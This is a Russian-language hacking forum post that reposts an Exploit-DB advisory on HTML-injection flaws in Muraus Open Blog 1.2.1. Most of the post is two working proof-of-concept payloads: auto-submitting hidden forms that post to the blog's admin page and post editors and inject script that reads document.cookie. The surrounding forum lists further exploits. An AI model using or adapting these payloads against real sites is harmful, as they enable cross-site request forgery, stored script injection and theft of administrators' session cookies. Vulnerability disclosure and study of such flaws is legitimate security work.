Exploit Muraus Open Blog - Multiple HTML Injection Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34416
Проверка EDB
  1. Пройдено
Автор
HIGH-TECH BRIDGE SA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-08-05
Muraus Open Blog - Multiple HTML Injection Vulnerabilities
Код: 
source: https://www.securityfocus.com/bid/42255/info

Tomaž Muraus Open Blog is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Tomaž Muraus Open Blog 1.2.1 is vulnerable; prior versions may also be affected. 

<form action="http://www.example.com/admin/pages/edit" method="post" >
<input type="hidden" name="title" value="open blog page title" />
<input type="hidden" name="content" value='Some page content and <script>alert(document.cookie)</script>' />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="id" value="1" />
<input type="submit" name="submit" id="sbmtit" value="Edit &rsaquo;&rsaquo;" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>



<form action="http://www.example.com/admin/posts/edit" method="post" >
<input type="hidden" name="title" value="Welcome to Open Blog" />
<input type="hidden" name="excerpt" value='Some text"><script>alert(document.cookie)</script>' />
<input type="hidden" name="content" value="" />
<input type="hidden" name="categories[]" value="1" />
<input type="hidden" name="tags" value="openblog" />
<input type="hidden" name="publish_date" value="13/07/2010" />
<input type="hidden" name="status" value="published" />
<input type="hidden" name="id" value="1" />
<input type="submit" name="submit" id="sbmtit" value="Edit &rsaquo;&rsaquo;" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Open-AudIT Professional 3.3.1 - Remote Code Execution
Ответы
0
Просмотры
780
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting
Ответы
0
Просмотры
769
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)
Ответы
0
Просмотры
781
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
Ответы
0
Просмотры
765
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation
Ответы
0
Просмотры
774
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow
Ответы
0
Просмотры
706
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation
Ответы
0
Просмотры
645
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)
Ответы
0
Просмотры
627
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Open Source Real Estate Script 3.6.0 - SQL Injection
Ответы
0
Просмотры
545
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Open Audit - SQL Injection
Ответы
0
Просмотры
504
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу